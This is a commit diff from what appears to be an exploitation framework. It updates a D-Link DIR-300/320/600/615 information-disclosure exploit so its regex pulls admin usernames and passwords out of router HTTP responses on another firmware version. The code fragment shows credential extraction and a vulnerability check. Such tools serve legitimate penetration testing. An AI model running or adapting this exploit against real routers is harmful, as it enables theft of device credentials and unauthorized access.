Commit 7aef97f9 by Maccheroni Committed by Marcin Bury

Update dir_300_320_600_615_info_disclosure.py (#388)

DIR-300 B1 with firmware 2.02 may have '\nuser' after admin password.
parent 822deeba
...@@ -35,7 +35,7 @@ class Exploit(HTTPClient): ...@@ -35,7 +35,7 @@ class Exploit(HTTPClient):
if response is None: if response is None:
return return
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text) creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)
if len(creds): if len(creds):
print_success("Credentials found!") print_success("Credentials found!")
...@@ -53,7 +53,7 @@ class Exploit(HTTPClient): ...@@ -53,7 +53,7 @@ class Exploit(HTTPClient):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text) creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)
if len(creds): if len(creds):
return True # target is vulnerable return True # target is vulnerable
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment